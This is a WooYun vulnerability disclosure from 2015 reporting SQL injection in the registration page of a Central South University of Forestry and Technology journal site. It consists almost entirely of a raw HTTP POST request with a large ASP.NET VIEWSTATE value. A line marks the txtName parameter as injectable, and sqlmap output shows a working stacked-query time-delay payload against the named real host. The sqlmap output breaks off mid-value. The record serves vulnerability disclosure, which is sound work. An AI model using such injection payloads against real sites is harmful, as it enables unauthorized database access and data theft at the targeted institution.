当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154498

漏洞标题:中南林业科技大学某站存在SQL注入漏洞

相关厂商:中南林业科技大学

漏洞作者: 凉凉

提交时间:2015-11-21 16:26

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-21: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

POST /Register.aspx HTTP/1.1
Content-Length: 14164
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jjlyj.csuft.edu.cn
Cookie: ASP.NET_SessionId=bb5jbe55kuaai255blh0vh55
Host: jjlyj.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24cphContect%24btnQuery=%cf%c2%d2%bb%b2%bd&ctl00%24cphContect%24cbAgree=on&ctl00%24cphContect%24txtName=V6aySdv'*&__EVENTVALIDATION=/wEWBQL%2buveoDQLq8vPZBwKDs/zYBAKBqKrKBQKgn4kUW//GNzbNBbOlQwg%2bfiRXtRQYq5w%3d&__VIEWSTATE=/wEPDwUJNzI4MDM2NzIxDxYCHgtSZWZlcnJlclVybAUaaHR0cDovL2pqbHlqLmNzdWZ0LmVkdS5jbi8WAmYPZBYCAgEPZBYIAgEPZBYEZg9kFgJmDxYCHgRUZXh0BfEBIDxlbWJlZCBoZWlnaHQ9IjE3MCIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHBsdWdpbnNwYWdlPSJodHRwOi8vd3d3Lm1hY3JvbWVkaWEuY29tL3Nob2Nrd2F2ZS9kb3dubG9hZC9pbmRleC5jZ2k/UDFfUHJvZF9WZXJzaW9uPVNob2Nrd2F2ZUZsYXNoIiB3aWR0aD0iOTkwIiBzcmM9Ii9JbWFnZXMvdG9wLnN3ZiIgcXVhbGl0eT0iaGlnaCIgd21vZGU9Im9wYXF1ZSIgc2NhbGU9ImV4YWN0Zml0IiAvPmQCAQ9kFgJmDxYCHwEF6Aw8dWw%2bPGxpPjxhIGhyZWY9Ii8iPummliDpobU8L2E%2bPC9saT48bGkgb25tb3VzZW92ZXI9InNob3dTdWJNZW51KHRoaXMpIiBvbm1vdXNlb3V0PSJoaWRlU3ViTWVudSh0aGlzKSI%2bPGEgaHJlZj0iL0NvcnAvMTAuYXNweCI%2b5pyf5YiK566A5LuLPC9hPiA8dWw%2bPGxpPjxhIGhyZWY9Ii9Db3JwLzEwLmFzcHgiPuacn%2bWIiuS7i%2be7jTwvYT48L2xpPjxsaT48YSBocmVmPSIvQ29ycC8yMC5hc3B4Ij7nvJblp5TnroDku4s8L2E%2bPC9saT48L3VsPjwvbGk%2bPGxpIG9ubW91c2VvdmVyPSJzaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9vYS8iPuaWh%2beroOafpeivojwvYT4gPHVsPjxsaT48YSBocmVmPSIvT0EvT0FNTC5hc3B4Ij7mnIDmlrDkuIDmnJ88L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iL29hLyI%2b5paH56ug5p%2bl6K%2biPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9vYS9kbGlzdG51bS5hc3B4Ij7mlofnq6DmgLvnm648L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iL29hL2RlZmluZGV4bnVtLmFzcHg/aWQ9MSI%2b5LiL6L295o6S5ZCNPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9vYS9kZWZpbmRleG51bS5hc3B4Ij7mtY/op4jmjpLlkI08L2E%2bPC9saT48L3VsPjwvbGk%2bPGxpIG9ubW91c2VvdmVyPSJzaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9kb2NzL3R6L2RlZmF1bHQuYXNweCI%2b6YCa55%2bl5YWs5ZGKPC9hPiA8L2xpPjxsaT48YSBocmVmPSIvZG9jcy96enlkL2RlZmF1bHQuYXNweCI%2b5L2c6ICF5Zut5ZywPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9Db3JwLzYwLmFzcHgiPuaKleeov%2bmhu%2befpTwvYT48L2xpPjxsaSBvbm1vdXNlb3Zlcj0ic2hvd1N1Yk1lbnUodGhpcykiIG9ubW91c2VvdXQ9ImhpZGVTdWJNZW51KHRoaXMpIj48YSBocmVmPSIvQ29ycC8xMzAwLmFzcHgiPuS4muWKoea1geeoizwvYT4gPHVsPjxsaT48YSBocmVmPSIvQ29ycC8xNDAwLmFzcHgiPuWuoeeov%2ba1geeoizwvYT48L2xpPjxsaT48YSBocmVmPSIvQ29ycC8xNTAwLmFzcHgiPue8lui%2bkea1geeoizwvYT48L2xpPjxsaT48YSBocmVmPSIvQ29ycC8xNjAwLmFzcHgiPuS7mOasvuaWueW8jzwvYT48L2xpPjwvdWw%2bPC9saT48bGkgb25tb3VzZW92ZXI9InNob3dTdWJNZW51KHRoaXMpIiBvbm1vdXNlb3V0PSJoaWRlU3ViTWVudSh0aGlzKSI%2bPGEgaHJlZj0iL0NvcnAvMzAuYXNweCI%2b572R5LiK6K6i6ZiFPC9hPiA8dWw%2bPGxpPjxhIGhyZWY9Ii9TdWJzY3JpYmUuYXNweCI%2b55S15a2Q54mI57Si6ZiFPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9Db3JwLzMwLmFzcHgiPue9keS4iuiuoumYhTwvYT48L2xpPjwvdWw%2bPC9saT48bGk%2bPGEgaHJlZj0iL0NvcnAvMTcwMC5hc3B4Ij7lvoHorqLlkK/kuos8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iL2RvY3MveHp6eC9kZWZhdWx0LmFzcHgiPuS4i%2bi9veS4reW/gzwvYT48L2xpPjxsaSBvbm1vdXNlb3Zlcj0ic2hvd1N1Yk1lbnUodGhpcykiIG9ubW91c2VvdXQ9ImhpZGVTdWJNZW51KHRoaXMpIj48YSBocmVmPSIvQ29ycC81MC5hc3B4Ij7ogZTns7vmiJHku6w8L2E%2bIDx1bD48bGk%2bPGEgaHJlZj0iL2d1ZXN0Ym9vay8iPueVmeiogOadvzwvYT48L2xpPjwvdWw%2bPC9saT48L3VsPmQCAw9kFgRmD2QWBAIJD2QWCAIBD2QWAgIBD2QWAgIFDw8WAh4HVmlzaWJsZWdkZAIDD2QWAgIBD2QWAgIFDw8WAh8CZ2RkAgUPZBYCAgEPZBYCAgMPDxYCHwJnZGQCBw9kFgICAQ9kFgICBQ8PFgIfAmdkZAILD2QWHAIDD2QWAgIBD2QWAgIBDxBkZBQrAQBkAgUPZBYCAgEPZBYCAgEPEGRkFgFmZAIHD2QWAgIBD2QWAgIBDxAPFgIeC18hRGF0YUJvdW5kZ2QQFTgG5rGJ5pePBuWjruaXjwbmu6Hml48G5Zue5pePBuiLl%2baXjwznu7TlkL7lsJTml48J5Zyf5a625pePBuW9neaXjwnokpnlj6Tml48G6JeP5pePCeW4g%2bS%2bneaXjwbkvpfml48G55G25pePCeacnemynOaXjwbnmb3ml48J5ZOI5bC85pePDOWTiOiQqOWFi%2baXjwbpu47ml48G5YKj5pePBueVsuaXjwnlg7Plg7Pml48J5Luh5L2s5pePCeS4nOS5oeaXjwnmi4nnpZzml48G5rC05pePBuS9pOaXjwnnurPopb/ml48G576M5pePBuWcn%2baXjwnku6vkvazml48J6ZSh5Lyv5pePD%2bafr%2bWwlOWFi%2bWtnOaXjwzovr7mlqHlsJTml48J5pmv6aKH5pePCeavm%2bWNl%2baXjwnmkpLmi4nml48J5biD5pyX5pePDOWhlOWQieWFi%2baXjwnpmL/mmIzml48J5pmu57Gz5pePDOmEgua4qeWFi%2baXjwbmgJLml48G5Lqs5pePCeWfuuivuuaXjwnlvrfmmILml48J5L%2bd5a6J5pePDOS/hOe9l%2baWr%2baXjwnoo5Xlm7rml48P5LmM5a2c5Yir5YWL5pePCemXqOW3tOaXjwzphILkvKbmmKXml48J54us6b6Z5pePDOWhlOWhlOWwlOaXjwnotavlk7Lml48J6auY5bGx5pePCeePnuW3tOaXjxU4ATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3AjE4AjE5AjIwAjIxAjIyAjIzAjI0AjI1AjI2AjI3AjI4AjI5AjMwAjMxAjMyAjMzAjM0AjM1AjM2AjM3AjM4AjM5AjQwAjQxAjQyAjQzAjQ0AjQ1AjQ2AjQ3AjQ4AjQ5AjUwAjUxAjUyAjUzAjU0AjU1AjU2FCsDOGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgBkAgkPFgIfAmcWAgIBD2QWAgIFDw8WAh8CZ2RkAgsPZBYCAgEPZBYCAgMPEA8WBh4NRGF0YVRleHRGaWVsZAUIUHJvdmluY2UeDkRhdGFWYWx1ZUZpZWxkBQpQcm92aWNlX0lEHwNnZA8WIwIBAgICAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiACIQIiAiMWIxAFBumZleilvwUBNGcQBQbljJfkuqwFATFnEAUG5LiK5rW3BQEyZxAFBuWkqea0pQUBNWcQBQbph43luoYFATZnEAUG5bGx5LicBQEzZxAFBuWQieaelwUCMTFnEAUG6L695a6BBQIxMGcQBQnpu5HpvpnmsZ8FAjEyZxAFBuaxn%2biLjwUCMTNnEAUG5a6J5b69BQIxNWcQBQbmtZnmsZ8FAjE0ZxAFBuays%2bWMlwUBN2cQBQbmsrPljZcFAjE4ZxAFBua5luWMlwUCMTlnEAUG5rmW5Y2XBQIyMGcQBQblsbHopb8FAThnEAUG5Zub5bedBQIyNGcQBQblub/kuJwFAjIxZxAFBuW5v%2bilvwUCMjJnEAUG56aP5bu6BQIxNmcQBQnlhoXokpnlj6QFATlnEAUG5rGf6KW/BQIxN2cQBQbmtbfljZcFAjIzZxAFBui0teW3ngUCMjVnEAUG5LqR5Y2XBQIyNmcQBQbopb/ol48FAjI3ZxAFBueUmOiCgwUCMjhnEAUG6Z2S5rW3BQIyOWcQBQblroHlpI8FAjMwZxAFBuaWsOeWhgUCMzFnEAUG6aaZ5rivBQIzMmcQBQblj7Dmub4FAjM1ZxAFBua%2bs%2bmXqAUCMzRnEAUG5rW35aSWBQIzM2cWAWZkAhMPZBYCAgEPZBYCAgMPEA8WBh8EBQhKb2JfS2luZB8FBQtKb2JfS2luZF9JRB8DZ2QPFgUCAQICAgMCBAIFFgUQBQ/lnKjor7vnoJTnqbbnlJ8FAjEwZxAFEuaVmeWtpuenkeeglOS6uuWRmAUCMjBnEAUS5bel56iL5oqA5pyv5Lq65ZGYBQI0MGcQBQznrqHnkIbkurrlkZgFAjYwZxAFBuWFtuWugwUCODFnFgFmZAIZDxYCHwJnFgICAQ9kFgQCAw8QDxYGHwQFCVVuaXRfS2luZB8FBQxVbml0X0tpbmRfSUQfA2dkDxYEAgECAgIDAgQWBBAFDOmrmOetiemZouagoQUCMTBnEAUM56eR56CU6Zmi5omABQIyMGcQBQzkvIHkuJrljZXkvY0FAjMwZxAFDOWFtuS7luaAp%2bi0qAUCNDBnFgFmZAIFDw8WAh8CZ2RkAhsPFgIeBXN0eWxlBRNiYWNrZ3JvdW5kOiNmNWY1ZjU7FgICAQ9kFgICBQ8PFgIfAmdkZAIdDxYCHwYFE2JhY2tncm91bmQ6I2Y1ZjVmNTtkAh8PFgIfBgUTYmFja2dyb3VuZDojZjVmNWY1O2QCKQ8WAh8CZxYCAgEPZBYCAgUPDxYCHwJnZGQCLQ9kFgICAQ9kFgICAQ8QDxYGHwQFClByb2ZmZXNpb24fBQUMUHJvZmVzc2lvbklEHwNnZBAVABUAFCsDABYAZAIvDxYCHwJnFgICAQ9kFgQCAw8QDxYGHwQFBkRlZ3JlZR8FBQlEZWdyZWVfSUQfA2dkDxYDAgECAgIDFgMQBQbljZrlo6sFAjQwZxAFBuehleWjqwUCMzBnEAUG5YW25LuWBQI0NmcWAWZkAgUPDxYCHwJnZGQCOw9kFgICAQ9kFgICAw8QZGQWAWZkAgEPZBYCAgUPPCsACwBkAgUPZBYIZg9kFgICAQ8WAh8CZxYCZg9kFgJmDxYCHwEF0gI8dWw%2bPGxpIGNsYXNzPSJsb2dpbnZpZXcwMSI%2bPGEgaHJlZj0iL0xvZ2luLmFzcHg/Um9sZT1hdXRob3IiPuWcqOe6v%2baKleeov%2bafpeeovzwvYT48L2xpPjxsaSBjbGFzcz0ibG9naW52aWV3MDIiPjxhIGhyZWY9Ii9Mb2dpbi5hc3B4P1JvbGU9ZXhwZXJ0Ij7kuJPlrrblnKjnur/lrqHnqL88L2E%2bPC9saT48bGkgY2xhc3M9ImxvZ2ludmlldzAzIj48YSBocmVmPSIvTG9naW4uYXNweD9Sb2xlPW1hbmFnZSI%2b57yW6L6R5Zyo57q/5Yqe5YWsPC9hPjwvbGk%2bPGxpIGNsYXNzPSJsb2dpbnZpZXcwNCI%2bPGEgaHJlZj0iL1JlZ2lzdGVyLmFzcHgiPuWcqCDnur8g5rOoIOWGjCA8L2E%2bPC9saT48L3VsPmQCAQ9kFgRmDxYCHgtfIUl0ZW1Db3VudAIGFgwCAQ9kFgICAQ8PFgYfAQUq5oiR5qCh5a2m5oql5ZKM44CK57uP5rWO5p6X56CU56m244CL5L2NLi4uHgdUb29sVGlwBVfmiJHmoKHlrabmiqXlkozjgIrnu4/mtY7mnpfnoJTnqbbjgIvkvY3lsYXkuK3lm73np5HmioDmoLjlv4PmnJ/liIrvvIjmnpflrabnsbvvvInliY3liJceC05hdmlnYXRlVXJsBU9%2bL2RvY3MveHdkdC9kZXRhaWxzLmFzcHg/ZG9jdW1lbnRpZD0yNyZOaWQ9N0I3RkFCNUEtMzM0NC00Nzg3LTk1NzktQzNDOEEzMjRCNzM1ZGQCAg9kFgICAQ8PFgYfAQUq5oiR5qCh6Ieq56eR5a2m5oql5ZKM44CK57uP5rWO5p6X56CU56m2Li4uHwgFTuaIkeagoeiHquenkeWtpuaKpeWSjOOAiue7j%2ba1juael%2beglOeptuOAi%2bi/nue7reWFpemAieWMl%2bWkp%2bS4reaWh%2baguOW/g%2bacn%2bWIih8JBU9%2bL2RvY3MveHdkdC9kZXRhaWxzLmFzcHg/ZG9jdW1lbnRpZD0yNiZOaWQ9MUNERDJERjQtRDgzQS00QjhELThFNDctRDAxREEwRjEwNkQwZGQCAw9kFgICAQ8PFgYfAQUo44CK57uP5rWO5p6X56CU56m244CL6I2j6I63MjAxNeW5tOenkS4uLh8IBVLjgIrnu4/mtY7mnpfnoJTnqbbjgIvojaPojrcyMDE15bm056eR5a2m5Ye654mI56S%2b4oCc5pyf5YiK5Ye654mI6LSo6YeP5LyY56eA5aWW4oCdHwkFT34vZG9jcy94d2R0L2RldGFpbHMuYXNweD9kb2N1bWVudGlkPTI1Jk5pZD1CRjc4NTE4NS05RURDLTREN0YtQjg0RC00QkMwRDNDN0UxNzdkZAIED2QWAgIBDw8WBh8BBSjjgIrnu4/mtY7mnpfnoJTnqbbjgIsyMDE15bm05b6B6K6i5ZCvLi4uHwgFKOOAiue7j%2ba1juael%2beglOeptuOAizIwMTXlubTlvoHorqLlkK/kuosfCQVPfi9kb2NzL3h3ZHQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9MjQmTmlkPUQyRDI5RDczLTg3QkQtNEI5OC04QUMyLTUxMTYyNTIwRTNFNGRkAgUPZBYCAgEPDxYGHwEFKuaIkeagoeWtpuacr%2bacn%2bWIiuW9seWTjeWKm%2bi/m%2bS4gOatpeaPkC4uLh8IBSrmiJHmoKHlrabmnK/mnJ/liIrlvbHlk43lipvov5vkuIDmraXmj5DljYcfCQVPfi9kb2NzL3h3ZHQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9MjMmTmlkPURDREE2MDY4LTMxQjgtNDZENS1CQTdCLUJGMjVDNjYzN0M5RmRkAgYPZBYCAgEPDxYGHwEFKuaIkeagoemmluasoeW9k%2bmAieS4reWbvemrmOagoeenkeaKgOacny4uLh8IBT/miJHmoKHpppbmrKHlvZPpgInkuK3lm73pq5jmoKHnp5HmioDmnJ/liIrnoJTnqbbkvJrnkIbkuovljZXkvY0fCQVPfi9kb2NzL3h3ZHQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9MjImTmlkPTA1Q0ZCM0FBLTYyQzYtNDZGOS05ODcxLUIyMDNDRkNFQkRFM2RkAgIPFgIfAmhkAgIPFgIeCWlubmVyaHRtbAWAFzx1bD48bGk%2bPHNwYW4gY2xhc3M9J3llYXInPjxhIGhyZWY9JyMnPjIwMTU8L2E%2bPC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDHmnJ8meWVhcj0yMDE15bm0Jz4wMeacnzwvYT48L3NwYW4%2bPHNwYW4gY2xhc3M9J251bWJlcic%2bPGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wMuacnyZ5ZWFyPTIwMTXlubQnPjAy5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAz5pyfJnllYXI9MjAxNeW5tCc%2bMDPmnJ88L2E%2bPC9zcGFuPjwvbGk%2bPGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDE0PC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxNOW5tCc%2bMDHmnJ88L2E%2bPC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDE05bm0Jz4wMuacnzwvYT48L3NwYW4%2bPHNwYW4gY2xhc3M9J251bWJlcic%2bPGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM%2bacnyZ5ZWFyPTIwMTTlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxNOW5tCc%2bMDTmnJ88L2E%2bPC9zcGFuPjwvbGk%2bPGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDEzPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxM%2bW5tCc%2bMDHmnJ88L2E%2bPC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEz5bm0Jz4wMuacnzwvYT48L3NwYW4%2bPHNwYW4gY2xhc3M9J251bWJlcic%2bPGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM%2bacnyZ5ZWFyPTIwMTPlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxM%2bW5tCc%2bMDTmnJ88L2E%2bPC9zcGFuPjwvbGk%2bPGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDEyPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxMuW5tCc%2bMDHmnJ88L2E%2bPC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEy5bm0Jz4wMuacnzwvYT48L3NwYW4%2bPHNwYW4gY2xhc3M9J251bWJlcic%2bPGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM%2bacnyZ5ZWFyPTIwMTLlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxMuW5tCc%2bMDTmnJ88L2E%2bPC9zcGFuPjwvbGk%2bPGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDExPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxMeW5tCc%2bMDHmnJ88L2E%2bPC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEx5bm0Jz4wMuacnzwvYT48L3NwYW4%2bPHNwYW4gY2xhc3M9J251bWJlcic%2bPGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM%2bacnyZ5ZWFyPTIwMTHlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxMeW5tCc%2bMDTmnJ88L2E%2bPC9zcGFuPjwvbGk%2bPC91bD5kAgMPZBYGZg8WAh8HZmQCAg8WAh8HAgUWCgIBD2QWAmYPFQIBOBjmuZbljZfnnIHmlrDpl7vlh7rniYjlsYBkAgIPZBYCZg8VAgE2GOS4reWNl%2bael%2bS4muenkeaKgOWkp%2bWtpmQCAw9kFgJmDxUCATch5Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m5pyf5YiK56S%2bZAIED2QWAmYPFQIBMiTkuK3lm73pq5jmoKHoh6rnhLbnp5HlrablrabmiqXnoJTnqbZkAgUPZBYCZg8VAgExHuS4reWbveenkeaKgOacn%2bWIiue8lui%2bkeWtpuS8mmQCBA8QDxYCHwJoZGQWAGQCBw9kFgICAQ8PFgIfAQXSBjxzcGFuIGNsYXNzPSJjb3B5cmlnaHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTog5a6L5L2TIj7niYjmnYPlvZLkuK3ljZfmnpfkuJrnp5HmioDlpKflrabmnJ/liIrnpL7miYDmnIk8L3NwYW4%2bJm5ic3A7IDxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPkFsbCBSaWdodHMgUmVzZXJ2ZWQmbmJzcDsgPC9zcGFuPjxhIGhyZWY9Imh0dHA6Ly93d3cudGV4dGNsaWNrLmNvbS92aWV3bWFpbi5hc3A/bmFtZT1jZW9jaW8iIHRhcmdldD0iX2JsYW5rIj48L2E%2bQ29weXJpZ2h0ICYjMTY5OyAyMDAwLTIwMTAmbmJzcDsmbmJzcDs8L3NwYW4%2bPC9zcGFuPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPiZuYnNwOzxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTog5a6L5L2TIj48YnIgLz48L3NwYW4%2b5Zyw5Z2A77ya5rmW5Y2X55yB6ZW/5rKZ5biC6Z%2b25bGx5Y2X6LevNDk45Y%2b3Jm5ic3A7Jm5ic3A7IOeUteivne%2b8mjA3MzEtODU2NTg1MjYmbmJzcDsmbmJzcDsmbmJzcDsgRS1tYWls77yaPC9zcGFuPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxhIGhyZWY9Im1haWx0bzpqamx5ai1jc2Z1QDE2My5jb20iPmpqbHlqLWNzZnVAMTYzLmNvbTwvYT4mbmJzcDsmbmJzcDsgPGJyIC8%2bPGJyIC8%2bPC9zcGFuPjwvc3Bhbj5kZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUYY3RsMDAkY3BoQ29udGVjdCRjYkFncmVlAsgwXztTMxYeylkgRSlcTFGc00Y%3d

ctl00%24cphContect%24txtName参数存在注入

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ctl00$cphContect$btnQuery=%cf%c2%d2%bb%b2%bd&ctl00$cphContect$cbAgree=on&ctl00$cphContect$txtName=V6aySdv';WAITFOR DELAY '0:0:10'--&__EVENTVALIDATION=/wEWBQL+uveoDQLq8vPZBwKDs/zYBAKBqKrKBQKgn4kUW//GNzbNBbOlQwg+fiRXtRQYq5w=&__VIEWSTATE=/wEPDwUJNzI4MDM2NzIxDxYCHgtSZWZlcnJlclVybAUaaHR0cDovL2pqbHlqLmNzdWZ0LmVkdS5jbi8WAmYPZBYCAgEPZBYIAgEPZBYEZg9kFgJmDxYCHgRUZXh0BfEBIDxlbWJlZCBoZWlnaHQ9IjE3MCIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHBsdWdpbnNwYWdlPSJodHRwOi8vd3d3Lm1hY3JvbWVkaWEuY29tL3Nob2Nrd2F2ZS9kb3dubG9hZC9pbmRleC5jZ2k/UDFfUHJvZF9WZXJzaW9uPVNob2Nrd2F2ZUZsYXNoIiB3aWR0aD0iOTkwIiBzcmM9Ii9JbWFnZXMvdG9wLnN3ZiIgcXVhbGl0eT0iaGlnaCIgd21vZGU9Im9wYXF1ZSIgc2NhbGU9ImV4YWN0Zml0IiAvPmQCAQ9kFgJmDxYCHwEF6Aw8dWw+PGxpPjxhIGhyZWY9Ii8iPum